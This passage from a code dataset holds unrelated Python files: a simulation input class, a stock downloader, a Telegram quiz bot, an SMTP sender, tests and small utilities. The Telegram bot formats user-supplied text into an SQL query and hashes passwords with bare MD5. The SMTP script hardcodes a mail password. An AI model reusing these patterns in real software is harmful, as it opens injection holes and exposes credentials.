self.bulk_anchor = False\n \nclass Spherical_cv_input(Serializer):\n \"\"\"\n Inputs by the user resulting in concentric spherical anchors\n with milestones and the collective variable (CV).\n \n Attributes:\n -----------\n index : int\n The index of this CV input object in the Model_input object.\n \n group1 : list\n A list of ints representing atom indices whose center of mass\n is one end of the CV distance vector.\n \n group2 : list\n A list of ints representing atom indices whose center of mass\n is the other end of the CV distance vector.\n \n input_anchors : list\n A list of Spherical_cv_anchor objects which specify inputs for\n the spherical anchors.\n \"\"\"\n \n def __init__(self):\n self.index = 0\n self.group1 = []\n self.group2 = []\n self.input_anchors = []\n return\n \n def read_plain_input(self, inputs):\n \"\"\"\n Read a plain input file (as opposed to an XML)\n \"\"\"\n \n raise Exception(\"Reading a plain text file is not yet implemented. \"\\\n \"Only an XML CV input may be read at this time.\")\n return\n \n def check(self):\n \"\"\"\n Check user inputs to ensure they have been entered properly.\n \"\"\"\n \n last_radius = -1e9\n found_bulk_anchor = False\n for i, input_anchor in enumerate(self.input_anchors):\n radius = input_anchor.radius\n assert radius >= 0.0, \"A radius must be greater than \"\\\n \"or equal to zero.\"\n assert radius > last_radius, \"Each subsequent radius \"\\\n \"argument must be greater than the last (sorted).\"\n \n if input_anchor.bound_state is None:\n input_anchor.bound_state = False\n \n assert input_anchor.bound_state in [True, False], \\\n \"bound_state must be a boolean\"\n \n if input_anchor.bulk_anchor is None:\n input_anchor.bulk_anchor = False\n \n assert input_anchor.bulk_anchor in [True, False], \\\n \"bulk_anchor must be a boolean\"\n \n if input_anchor.bulk_anchor:\n assert not found_bulk_anchor, \"Only one bulk anchor allowed \"\\\n \"per set of anchors in a CV.\"\n found_bulk_anchor = False\n else:\n assert not found_bulk_anchor, \"Only the outermost anchor \"\\\n \"should be the bulk anchor.\"\n \n if i > 0:\n assert not input_anchor.bound_state, \"Only the lowest\"\\\n \"anchor can be the bound state.\"\n \n assert len(self.input_anchors) > 1, \"A CV must contain \"\\\n \"more than one anchor.\"\n return\n \n","sub_path":"seekr2/modules/common_cv.py","file_name":"common_cv.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"492415487","text":"from nsepy import get_history\nfrom datetime import datetime,timedelta,date\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport matplotlib\nimport operator\nimport itertools\nfrom nsepy.symbols import get_symbol_list, get_index_constituents_list\nimport matplotlib.pyplot as plt\n\n\n\ndef download_data(token_name, from_date, to_date,interval,indexbool,l):\n i=0\n while i < len(token_name):\n records = get_history(symbol=token_name[i],start=from_date,end=to_date,index=indexbool)\n df = pd.DataFrame(records)\n if i ==0:\n df_final = df\n else:\n df_final = pd.concat([df_final, df],axis = 0) \n i = i+1\n df_final['Date']=df_final.index\n df_final.to_excel(str(l)+'_rawlong.xlsx')\n\n\nnifty50=get_index_constituents_list(\"nifty50\").Symbol.tolist()\n# niftymidcap50=get_index_constituents_list(\"niftymidcap50\").Symbol.tolist()\nniftymidcap100=get_index_constituents_list(\"niftymidcap100\").Symbol.tolist()\n# niftymidcap150=get_index_constituents_list(\"niftymidcap150\").Symbol.tolist()\nniftysmallcap100=get_index_constituents_list(\"niftysmallcap100\").Symbol.tolist()\n# token_name = ['ADANIPOWER','AMARAJABAT','APOLLOHOSP','APOLLOTYRE','ASHOKLEY','BALKRISIND','BANKINDIA','BATAINDIA','BEL','BHARATFORG','BHEL','CESC','CANBK','CASTROLIND','CHOLAFIN','CUMMINSIND','ESCORTS','EXIDEIND','FEDERALBNK','GMRINFRA','GLENMARK','GODREJPROP','IDFCFIRSTB','IBULHSGFIN','JINDALSTEL','JUBLFOOD','L&TFH','LICHSGFIN','MRF','MGL','MANAPPURAM','MFSL','MINDTREE','NATIONALUM','OIL','RBLBANK','RECLTD','SRF','SAIL','SUNTV','TVSMOTOR','TATACONSUM','TATAPOWER','RAMCOCEM','TORNTPOWER','UNIONBANK','IDEA','VOLTAS','NETFMID150']\n# index_name=['NIFTYMID50','NIFTY SMALLCAP 50','NIFTY AUTO','NIFTY BANK','NIFTY IT','NIFTY METAL','NIFTY REALTY','NIFTY PHARMA','NIFTY FMCG','NIFTY GROWSECT 15','NIFTY50 VALUE 20','NIFTY GS 10YR']\n# etf_name=['GOLDBEES','LIQUIDBEES','LICNETFGSC','SETF10GILT','NETFLTGILT']\n\n\nindexwise_dict={}\nindexwise_dict['nifty50']=nifty50\n#indexwise_dict['niftymidcap50']=niftymidcap50\nindexwise_dict['niftymidcap100']=niftymidcap100\n#indexwise_dict['niftymidcap150']=niftymidcap150\nindexwise_dict['niftysmallcap100']=niftysmallcap100\n#indexwise_dict['etfs']=etf_name\n\n\nto_date = date.today()- timedelta(days=0)\ninterval = \"day\"\nfrom_date=date(2010,1,1)\n\nfor l in indexwise_dict.keys():\n download_data(indexwise_dict[l], from_date, to_date,interval,False,l)\n \n\n\n","sub_path":"Codes/longtermdownloaddata.py","file_name":"longtermdownloaddata.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"257382821","text":"#!/usr/bin/python \n# -*- coding: utf-8 -*-\nfrom Car import Car\nfrom Cross import Cross\nfrom Road import Road\nfrom PresetCar import PresetCar\n\nclass SettingData(object):\n \"\"\"\n for dualing with all the input data.\n\n Attributes:\n carFile: loading the car data filepath\n crossFile: loading the cross data filepath\n roadFile: loading the road data filepath\n presetFile: loading the presetdata filepath\n\n carDict: a dict that stores all the car's data\n Key: carId\n Values: car's Args()\n\n crossDict: a dict that stores all the cross's data\n Key: crossId\n Values: cross's Args()\n\n roadDict: a dict that stores all the road's data\n Key: roadId\n Values: road's Args()\n\n carQueue: a queue that store all the cars that has not startup\n\n presetQueue: a queue that stores all the preset cars that has not startup\n \"\"\"\n def __init__(self, carFile = None, crossFile = None, roadFile = None, presetFile = None):\n \"\"\"\n A constructor for initiating the original data.\n\n Args:\n carFile: loading the car data filepath\n crossFile: loading the cross data filepath\n roadFile: loading the road data filepath\n \"\"\"\n self.carFile = carFile\n self.crossFile = crossFile\n self.roadFile = roadFile\n self.presetFile = presetFile\n\n self.carDict = dict()\n self.crossDict = dict()\n self.roadDict = dict()\n self.carQueue = list()\n self.vipcarQueue = list()\n self.presetQueue = list()\n\n self.init()\n \n def init(self):\n \"\"\"\n for init all the data that by loading the files\n \"\"\"\n self.getCarMap()\n self.getRoad()\n self.getCross()\n self.getPresetCar()\n self.rankpresetcarQueue()\n #self.rankcarQueue()\n\n def getPresetCar(self):\n \"\"\"\n create all the presetCar queue via input file.\n\n \"\"\"\n try:\n file = open(self.presetFile, mode = 'r', encoding = \"UTF-8\")\n while True:\n line = file.readline()\n if line == \"\":\n break\n if line.startswith(\"#\"):\n continue\n args = str.split((line.strip())[1:-1], \",\")\n for i in range(len(args)):\n args[i] = int(args[i].strip())\n self.presetQueue.append(PresetCar(args[0], args[1], args[2:]))\n finally:\n file.close()\n\n\n def getCarMap(self):\n \"\"\"\n create all the cars via input file.\n\n also, initiating the carQueue for the game\n \"\"\"\n try:\n file = open(self.carFile, mode=\"r\", encoding=\"utf-8\")\n while True:\n line = file.readline()\n if line == \"\":\n break\n if line.startswith(\"#\"):\n continue\n args = str.split((line.strip())[1:-1], \",\")\n # create carDict\n if int(args[6].strip())==0:\n self.carDict[int(args[0].strip())] = Car(int(args[0].strip()), int(args[1].strip()), int(args[2].strip()), int(args[3].strip()), int(args[4].strip()), int(args[5].strip()), int(args[6].strip()))\n # create carQueue\n if int(args[5].strip())==1:\n self.vipcarQueue.append(self.carDict[int(args[0])])\n else:\n self.carQueue.append(self.carDict[int(args[0])])\n\n finally:\n file.close()\n\n def getRoad(self):\n \"\"\"\n create all the roads via input file, stored in the roadDict\n \"\"\"\n try:\n file = open(self.roadFile, mode=\"r\", encoding=\"utf-8\")\n lines = file.readlines()\n for line in lines:\n if line == \"\" or line is None:\n break\n if line.startswith(\"#\"):\n continue\n args = str.split((line.strip())[1:-1], \",\")\n self.roadDict[int(args[0].strip())] = Road(int(args[0].strip()),int(args[1].strip()),int(args[2].strip()),\n int(args[3].strip()),int(args[4].strip()),int(args[5].strip()),int(args[6].strip())) \n finally:\n file.close()\n\n def getCross(self):\n \"\"\"\n create all the crosses via input file, stored in the crossDict\n \"\"\"\n try:\n file = open(self.crossFile, mode=\"r\", encoding=\"utf-8\")\n lines = file.readlines()\n for line in lines:\n if line == \"\" or line is None:\n break\n if line.startswith(\"#\"):\n continue \n args = str.split((line.strip())[1:-1], \",\")\n self.crossDict[int(args[0].strip())] = Cross(int(args[0].strip()),int(args[1].strip()),int(args[2].strip()),\n int(args[3].strip()),int(args[4].strip())) \n finally:\n file.close() \n \n def maxStartTime(self):\n \"\"\"\n get the max start time from all the cars\n\n Returns:\n a int that indicts the max start time in all cars\n \"\"\"\n max_time = -1\n for id in self.carDict.keys():\n max_time = max(self.carDict[id], max_time)\n return max_time\n\n def rankcarQueue(self):\n self.carQueue.sort(key=lambda e: e.startTime, reverse = True)\n self.carQueue.sort(key=lambda e: e.maxSpeed)\n #self.carQueue.sort(key=lambda e: e.priority)\n \n def rankvipcarQueue(self):\n self.carQueue.sort(key=lambda e: e.startTime, reverse = True)\n self.carQueue.sort(key=lambda e: e.maxSpeed)\n #self.carQueue.sort(key=lambda e: e.priority)\n \n def rankpresetcarQueue(self):\n self.presetQueue.sort(key=lambda e: e.startTime, reverse = True)","sub_path":"Huawei_Python/SDK_python/CodeCraft-2019/src/SettingData.py","file_name":"SettingData.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"499835970","text":"# Разумеется, возможностей у бота гораздо больше.\n# Модерить чат, выдавать промо-коды, новые стикеры, обмениваться контактами и локациями и т.д.\n# В рамках тестового кейса это не реализовано, но потенциально возможно в течение короткого време��и\n\nimport work_with_DB\nimport config\nimport hashlib\nimport random\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot(token=config.token)\n\n# Custom Keyboards\nRegisterMarkup = types.ReplyKeyboardMarkup()\nRegisterMarkup.row('Зарегистрироваться')\n\nhide = types.ReplyKeyboardRemove()\n\nMainMarkup = types.ReplyKeyboardMarkup()\nMainMarkup.row('Скинуть картиночку', 'Обработать картиночку')\nMainMarkup.row('Скинуть песню', 'Послушать голосовое', 'Сделать рассылку')\nMainMarkup.row('Сыграть', 'Добавить вопрос')\n\n# BotHandlers\n\n# Registration functions\n@bot.message_handler(commands=[\"start\"])\ndef start(message):\n bot.send_message(message.chat.id, \"Отлично! Давай начнем\\n\"\n \"Нажми на кнопку 'Зарегистрироваться' для регистрации в боте\",\n reply_markup=RegisterMarkup)\n bot.register_next_step_handler(message, register)\n\n\ndef register(message):\n if message.text == 'Зарегистрироваться' or message.text == 'зарегистрироваться':\n bot.send_message(message.chat.id, \"Молодец!\\n\"\n \"Теперь введи свой уникальный логин\",\n reply_markup=hide)\n bot.register_next_step_handler(message, login)\n else:\n bot.send_message(message.chat.id, \"Извини, но я тебя не понимаю(( Попробуй еще раз\")\n bot.register_next_step_handler(message, register)\n\n\ndef login(message):\n try:\n all_users = work_with_DB.select(\"SELECT Login FROM users\")\n flag = False\n for i in all_users:\n if i[0] == message.text:\n flag = True\n break\n if not flag:\n bot.send_message(message.chat.id, \"Супер! Теперь придумай пароль!\")\n bot.register_next_step_handler(message, password, message.text)\n else:\n bot.send_message(message.chat.id, \"Извини, но этот логин уже занят(( Попробуй еще раз\")\n bot.register_next_step_handler(message, login)\n except:\n print(\"Troubles with DB in func 'login'\")\n\n\n# Save password in DB as hash\ndef password(message, login):\n if len(message.text) > 4:\n try:\n pwd = message.text\n salt = hashlib.md5(pwd.encode())\n work_with_DB.register(login, salt.hexdigest(), message.chat.id)\n bot.send_message(message.chat.id, \"Готово! Теперь ты можешь пользоваться ботом\", reply_markup=MainMarkup)\n except:\n print(\"Trouble with DB if func 'password'\")\n else:\n bot.send_message(message.chat.id, \"Слишком короткий пароль(( Попробуй еще\")\n bot.register_next_step_handler(message, password, login)\n\n\n# Возможности бота:\n# ToDo Сделать проверку авторизации\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n bot.send_message(message.chat.id, \"Вот, что я умею:\\n\"\n \"/img - скинуть картиночку\\n\"\n \"/filter_img - обработаю твою картиночку\\n\"\n \"/music - скину песню\\n\"\n \"/voice - прослушаю твое голосовое\\n\"\n \"/quiz - сыграем с тобой в викторину\\n\"\n \"/add_quiz - добавит мини-quiz\\n\"\n \"/send_all - сделаю рассылку всем авторизованным пользователям\")\n\n\n@bot.message_handler(commands=[\"img\", \"filter_img\", \"music\", \"voice\", \"quiz\", \"add_quiz\", \"send_all\"])\ndef Distributor(message):\n mes = message.text[1:]\n if mes == 'img':\n send_img(message)\n elif mes == 'filter_img':\n filter_img(message)\n elif mes == 'music':\n music(message)\n elif mes == 'voice':\n voice(message)\n elif mes == 'send_all':\n send_all(message)\n elif mes == 'quiz':\n quiz(message)\n elif mes == 'add_quiz':\n add_quiz(message)\n\n\ndef send_img(message):\n bot.send_photo(message.chat.id, 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Papirus-64-apps-icq.svg/1200px-Papirus-64-apps-icq.svg.png')\n\n\ndef filter_img(message):\n bot.send_message(message.chat.id, 'Отправь ссылку на фотографию для обработки')\n bot.register_next_step_handler(message, filter_img_request)\n\n\ndef filter_img_request(message):\n bot.send_message(message.chat.id, 'if I am allowed to use API, I will send you a filtered photo')\n try:\n bot.send_photo(message.chat.id, message.text)\n except:\n print('message.text != photo_url')\n\n\ndef music(message):\n bot.send_audio(message.chat.id, 'http://d.zaix.ru/ic9z.mp3')\n\n\ndef voice(message):\n bot.send_message(message.chat.id, 'Скинь голосовое сообщение')\n bot.register_next_step_handler(message, voice_request)\n\n\ndef voice_request(message):\n bot.send_message(message.chat.id, 'Я тебя услышал')\n\n\ndef send_all(message):\n try:\n all_users = work_with_DB.select(\"SELECT TelegramID FROM users\")\n users_send = []\n for i in all_users:\n if i[0] not in users_send:\n bot.send_message(i[0], 'Рассылка')\n users_send.append(i[0])\n except:\n print('Mailing errors')\n\n\ndef quiz(message):\n try:\n all_quiz = work_with_DB.select(\"SELECT * FROM quiz\")\n rand = random.randint(0, len(all_quiz) -1)\n bot.send_message(message.chat.id, 'Вот твой вопрос:\\n\"'\n + all_quiz[rand][0] +\n '\"\\nТеперь жду ответ')\n bot.register_next_step_handler(message, answer_quiz, all_quiz[rand][0])\n except:\n print('Troubles in quiz')\n\n\ndef answer_quiz(message, question):\n try:\n answer = work_with_DB.select(\"SELECT Answer FROM `quiz` WHERE `Question` = {}\".format(\"'\" + str(question) + \"'\"))\n if message.text == answer[0]:\n bot.send_message(message.chat.id, 'Congratulations')\n else:\n bot.send_message(message.chat.id, 'Попробуй еще раз')\n bot.register_next_step_handler(message, answer_quiz)\n except:\n print('Trouble in answer_quiz')\n\n\ndef add_quiz(message):\n bot.send_message(message.chat.id, 'Введи вопрос')\n bot.register_next_step_handler(message, set_question)\n\n\ndef set_question(message):\n question = message.text\n bot.send_message(message.chat.id, 'Отлчино, теперь ответ')\n bot.register_next_step_handler(message, set_answer, question)\n\n\ndef set_answer(message, question):\n try:\n work_with_DB.new_quiz(question, message.text)\n bot.send_message(message.chat.id, 'Успех!')\n except:\n print('Trouble in set_answer')\n\n\n# Distributor\n@bot.message_handler(content_types=[\"text\"])\ndef distributor(message):\n mes = message.text\n if mes == 'Скинуть картиночку':\n send_img(message)\n elif mes == 'Обработать картиночку':\n filter_img(message)\n elif mes == 'Скинуть песню':\n music(message)\n elif mes == 'Послушать голосовое':\n voice(message)\n elif mes == 'Сделать рассылку':\n send_all(message)\n elif mes == 'Сыграть':\n quiz(message)\n elif mes == 'Добавить вопрос':\n add_quiz(message)\n\n\nbot.polling(none_stop=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"600196001","text":"\"\"\"Download required remote files.\"\"\"\n\nimport codecs\nimport collections\nimport json\nimport os\nimport zipfile\n\nimport requests\nimport requests.exceptions\n\nMTGJSON_ADDRESS = \"http://mtgjson.com/json/\"\nVERSION_FILENAME = \"version-full.json\"\nALLSETS_FILENAME = \"AllSets.json.zip\"\n\n\nclass Error(Exception):\n \"\"\"Base error class for this module.\"\"\"\n\n\nclass DownloadError(Error):\n \"\"\"Raised if the downloader fails to fetch a file.\"\"\"\n\n\ndef fetch_mtgjson(data_path):\n \"\"\"Check version and fetch (if needed) mtgjson file to data_path.\"\"\"\n if not os.path.exists(data_path):\n os.makedirs(data_path)\n elif not os.path.isdir(data_path):\n raise DownloadError(\"data_path: %s must be a folder\" % data_path)\n\n allsets_filename = os.path.join(data_path, ALLSETS_FILENAME)\n version_filename = os.path.join(data_path, VERSION_FILENAME)\n if os.path.exists(allsets_filename) and os.path.exists(version_filename):\n with open(version_filename, \"r\") as version_file:\n local_version_data = json.load(version_file)\n local_version = tuple(\n int(v) for v in local_version_data[\"version\"].split(\".\")\n )\n else:\n local_version = (0, 0, 0)\n\n try:\n print(\"Checking remote vs local version of mtgjson data.\")\n ver_req = requests.get(MTGJSON_ADDRESS + VERSION_FILENAME)\n ver_req.raise_for_status()\n\n remote_version_data = ver_req.json()\n remote_version = tuple(\n int(v) for v in remote_version_data[\"version\"].split(\".\")\n )\n\n if local_version >= remote_version:\n print(\"Mtgjson data is already up to date.\")\n return False\n\n print(\"Downloading mtgjson data.\")\n mtg_req = requests.get(MTGJSON_ADDRESS + ALLSETS_FILENAME)\n mtg_req.raise_for_status()\n with open(allsets_filename, \"wb\") as allsets_file:\n allsets_file.write(mtg_req.content)\n with open(version_filename, \"wb\") as version_file:\n version_file.write(ver_req.content)\n return True\n except requests.ConnectionError as err:\n raise DownloadError(\"Could not connect to mtgjson\") from err\n except requests.exceptions.HTTPError as err:\n raise DownloadError(\"Could not retrieve mtgjson data\") from err\n\n\ndef read_mtgjson(data_path):\n \"\"\"Read data from mtgjson file and return loaded contents.\"\"\"\n allsets_filename = os.path.join(data_path, ALLSETS_FILENAME)\n with zipfile.ZipFile(allsets_filename, \"r\") as allsets_zipfile:\n [datafilename] = allsets_zipfile.namelist()\n datafile = allsets_zipfile.open(datafilename)\n reader = codecs.getreader(\"utf-8\")\n mtgdata = json.load(reader(datafile), object_pairs_hook=collections.OrderedDict)\n return mtgdata\n","sub_path":"mtg_ssm/mtgjson.py","file_name":"mtgjson.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"280054304","text":"# Copyright 2013 - Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nimport testscenarios\n\nfrom solum.api.controllers.v1.datamodel import sensor as model\nfrom solum.api.controllers.v1 import sensor as controller\nfrom solum.tests import base\nfrom solum.tests import fakes\n\n\nload_tests = testscenarios.load_tests_apply_scenarios\n\n\nclass TestSensorValueTypeGood(base.BaseTestCase):\n\n scenarios = [\n ('int_str', dict(\n in_value=3, in_type='str', out_value='3')),\n ('int_int', dict(\n in_value=3, in_type='int', out_value=3)),\n ('str_int', dict(\n in_value='3', in_type='int', out_value=3)),\n ('float_str', dict(\n in_value=3.4, in_type='str', out_value='3.4')),\n ('str_float', dict(\n in_value='2.45', in_type='float', out_value=2.45)),\n ('float_float', dict(\n in_value=2.45, in_type='float', out_value=2.45)),\n ]\n\n def test_values(self):\n s = model.Sensor(sensor_type=self.in_type, value=self.in_value)\n self.assertEqual(self.out_value, s.value)\n\n\nclass TestSensorValueTypeBad(base.BaseTestCase):\n\n scenarios = [\n ('sp_int', dict(\n in_value=3.2, in_type='int')),\n ('bp_int', dict(\n in_value=3.7, in_type='int')),\n ('sn_int', dict(\n in_value=-3.1, in_type='int')),\n ('bn_int', dict(\n in_value=-3.9, in_type='int')),\n ('float', dict(\n in_value='sunny', in_type='float')),\n ]\n\n def test_values(self):\n s = model.Sensor(sensor_type=self.in_type, value=self.in_value)\n self.assertRaises(ValueError, getattr, s, 'value')\n\n\n@mock.patch('pecan.request', new_callable=fakes.FakePecanRequest)\n@mock.patch('pecan.response', new_callable=fakes.FakePecanResponse)\nclass TestSensorController(base.BaseTestCase):\n def test_sensor_get(self, resp_mock, request_mock):\n obj = controller.SensorController('test_id')\n sensor_model = obj.get()\n self.assertEqual(200, resp_mock.status)\n self.assertIsNotNone(sensor_model)\n\n def test_sensor_put(self, resp_mock, request_mock):\n obj = controller.SensorController('test_id')\n obj.put(None)\n self.assertEqual(400, resp_mock.status)\n\n def test_sensor_delete(self, resp_mock, request_mock):\n obj = controller.SensorController('test_id')\n obj.delete()\n self.assertEqual(400, resp_mock.status)\n\n\n@mock.patch('pecan.request', new_callable=fakes.FakePecanRequest)\n@mock.patch('pecan.response', new_callable=fakes.FakePecanResponse)\nclass TestSensorsController(base.BaseTestCase):\n def test_sensors_get_all(self, resp_mock, request_mock):\n sensor_obj = controller.SensorsController()\n resp = sensor_obj.get_all()\n self.assertIsNotNone(resp)\n self.assertEqual(200, resp_mock.status)\n\n def test_sensors_post(self, resp_mock, request_mock):\n obj = controller.SensorsController()\n obj.post(None)\n self.assertEqual(400, resp_mock.status)\n","sub_path":"solum/tests/api/v1/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"150425005","text":"import os\nimport shutil\nimport csv\nfrom os.path import isfile, join\nimport glob\nimport numpy\n\n# Get current path.\nmypath = os.getcwd()\n\n\ndef create_spreadsheet():\n folders = img_folder_list()\n folders.sort()\n folder_list = []\n header = []\n for folder in folders:\n folder_list.append([folder+\"/\"+f for f in os.listdir(mypath+'/'+folder) if f.endswith(\".jpg\") or f.endswith(\".jpeg\")])\n \n for i in range(img_folder_count()):\n header.append(\"Image\"+str(i+1))\n \n transposed_list = numpy.transpose(folder_list)\n\n #this works but is hardcoded solution\n with open('variables.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n for row in transposed_list:\n writer.writerow(row)\n print(\"[ALERT] Row Created.\")\n\n print(\"[INFO] Spreadsheet Created.\")\n\n menu()\n\ndef reset_image_folders():\n # Make list of all image directories.\n reset_folders = glob.glob('img*') + glob.glob('output') + glob.glob('temp') + glob.glob('psd')\n for item in reset_folders:\n if os.path.isdir(item):\n shutil.rmtree(item)\n print(\"[ALERT] /\"+item+\" deleted.\")\n\n else:\n print(\"[ALERT] /\"+item+\" not found.\")\n print(\"[INFO] All folders reset.\")\n menu()\n\ndef img_folder_count():\n # Counts number of image folders.\n return len(img_folder_list())\n\ndef img_folder_list():\n return glob.glob('img*')\n\ndef create_image_directories(img_count):\n # Create directories for each image.\n try:\n for i in range(img_count):\n os.mkdir(mypath+'/img'+str(i+1))\n os.mkdir(mypath+'/psd')\n os.mkdir(mypath+'/temp')\n os.mkdir(mypath+'/output')\n print(\"[INFO] Image directories created.\")\n print(\"[INFO] Utility directories created.\")\n menu()\n except:\n print(\"[ERROR] Image directories already exist.\")\n menu()\n\ndef menu():\n\n print(\"\\nPS Batch Export Script\")\n print(\"1)Create CSV \\n2)Reset Program \\n3)Create Directories \\n4)Exit\")\n user = input()\n try:\n if user == \"1\":\n create_spreadsheet()\n elif user == \"2\":\n print(\"[ALERT] DOING THIS WILL DELETE ALL IMG FOLDERS AND THEIR CONTENTS!\")\n reset_program = input(\"Are you sure you want to reset the program? (y/n)\")\n if reset_program == \"y\" or reset_program == \"Y\":\n reset_image_folders()\n else:\n print(\"[INFO] Reset Aborted.\")\n menu()\n elif user == \"3\":\n img_count = input(\"How many image folders do you want to create? \")\n create_image_directories(int(img_count))\n elif user == \"4\":\n print(\"[INFO] Program terminated.\")\n exit()\n\n except:\n print(\"[WARNING] Something went wrong.\")\n menu()\n\nmenu()\n","sub_path":"PhotoshopExportScript.py","file_name":"PhotoshopExportScript.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"259123529","text":"import config\nfrom getch import *\nfrom displaySetup import *\n\nimport time, os, sys, random\n\n# class definition of player\nclass Player:\n def __init__(self, screenHeight, floorsize):\n self.simplePlayer = 'm'\n self.powerPlayer = 'M'\n self.playerWidth = 2\n self.playerHeight = 2\n self.playerX = screenHeight - floorsize\n self.playerY = 1\n self.isjump = False\n self.score = 0\n self.lives = 3\n \n # clear initial position\n def clearpos(self):\n for i in range(self.playerHeight):\n for j in range(self.playerWidth):\n display[self.playerX - i][self.playerY + j] = ' '\n \n def pifall(self):\n if self.playerX == screenHeight:\n self.lives -= 1\n self.score = 0\n config.leftY = 0\n config.rightY = screenWidth + 1\n self.clearpos()\n self.playerX = base\n self.playerY = 1\n \n def setplayer(self, display):\n for i in range(2):\n for j in range(2):\n display[self.playerX - i][self.playerY + j] = self.simplePlayer\n \n # checking whether gravity acts\n def checkGravity(self):\n while (display[self.playerX + 1][self.playerY] == ' ') and (display[self.playerX + 1][self.playerY + 1] == ' '):\n self.clearpos()\n self.playerX += 1\n os.system(\"clear\")\n self.setplayer(display)\n self.setplayer(display)\n printgame()\n time.sleep(0.020)\n\n\n #right movement\n def moveright(self):\n if display[self.playerX][self.playerY + 2] != ' ' or display[self.playerX - 1][self.playerY + 2] != ' ':\n return\n self.clearpos()\n self.playerY += 1\n if self.playerY >= screenWidth // 2 and config.rightY < totalWidth:\n config.leftY += 1\n config.rightY += 1\n\n #left movement\n def moveleft(self):\n if self.playerY == 0:\n return\n if display[self.playerX][self.playerY - 1] != ' ' or display[self.playerX - 1][self.playerY - 1] != ' ':\n return\n self.clearpos()\n self.playerY -= 1\n if config.leftY > 0:\n config.leftY -= 1\n config.rightY -= 1\n\n \n #checking for upper obstacle\n def upObs(self):\n for i in range(self.playerWidth):\n try:\n if display[self.playerX - 2][self.playerY + i] != ' ':\n return True\n except:\n return True\n return False\n \n #up movement\n def moveup(self):\n global simMove\n self.isjump = True\n for i in range(maxjump):\n if self.upObs():\n break\n self.clearpos()\n self.playerX -= 1\n if self.isjump:\n keypress = get_input()\n if self.upObs():\n break\n self.isjump = False\n simMove -= 1\n \n ## simultaneous movement\n if simMove:\n simMove -= 1\n if keypress == 'a':\n self.moveleft()\n elif keypress == 'd':\n self.moveright()\n time.sleep(0.100)\n os.system(\"clear\")\n self.setplayer(display)\n printgame()\n self.isjump = False\n self.checkGravity()\n\n # generalized movement of the player\n def movement(self):\n keypress = getch()\n if keypress == 'q':\n return keypress\n elif keypress == 'a':\n self.moveleft()\n elif keypress == 'd':\n self.moveright()\n elif keypress == 'w':\n self.moveup()\n return keypress\n","sub_path":"playerClass.py","file_name":"playerClass.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"572872796","text":"from email.header import Header\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTP\n\nsender = 'd1452823030@163.com'\nreceiver = 'd1452823030@163.com'\nmessage = MIMEText(_text='这是内容', _charset='utf8')\nmessage['From'] = Header(sender, 'utf8')\nmessage['To'] = Header(receiver, 'utf8')\nmessage['Subject'] = Header('测试邮件', 'utf8')\nsmtp = SMTP()\nsmtp.connect('smtp.163.com')\nsmtp.login('d1452823030', 'zxcv123456')\nsmtp.sendmail(sender, receiver, message.as_string())\n","sub_path":"smtp_test.py","file_name":"smtp_test.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"401497540","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[2]:\n\n\nn = int(input())\n\n\n# In[9]:\n\n\ndef func(s):\n if int(s) > n:\n return 0\n \n ret = 1 if all(s.count(c) > 0 for c in '753') else 0\n for c in \"753\":\n ret += func(s + c)\n return ret\n\nprint(func(\"0\"))\n\n","sub_path":"ABC114/C/C_main.py","file_name":"C_main.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"157806417","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom rdp import rdp\n\n# polyline coordinates\ncoord = [[30, -245], [61, -186], [80, -134], [125, -129], [153, -165], [173, -199],\n [224, -212], [268, -178], [286, -137], [319, -132], [352, -158], [371, -155],\n [399, -156], [419, -188], [445, -207], [460, -194], [472, -200], [489, -185],\n [480, -138], [465, -87], [477, -44], [501, -41], [544, -81], [570, -118]]\n\n# implementation of the Ramer-Douglas-Peucker algorithm: https://pypi.python.org/pypi/rdp\nres100 = rdp(coord, epsilon=100)\nres50 = rdp(coord, epsilon=50)\nres25 = rdp(coord, epsilon=25)\nres10 = rdp(coord, epsilon=10)\n\n# convert python array to numpy-stype array\nnp_coord = np.asarray(coord)\nnp_res100 = np.asarray(res100)\nnp_res50 = np.asarray(res50)\nnp_res25 = np.asarray(res25)\nnp_res10 = np.asarray(res10)\n\n# plot polylines\nplt.plot(np_coord[:,0], np_coord[:,1], \"ko-\")\nplt.plot(np_res100[:,0], np_res100[:,1], 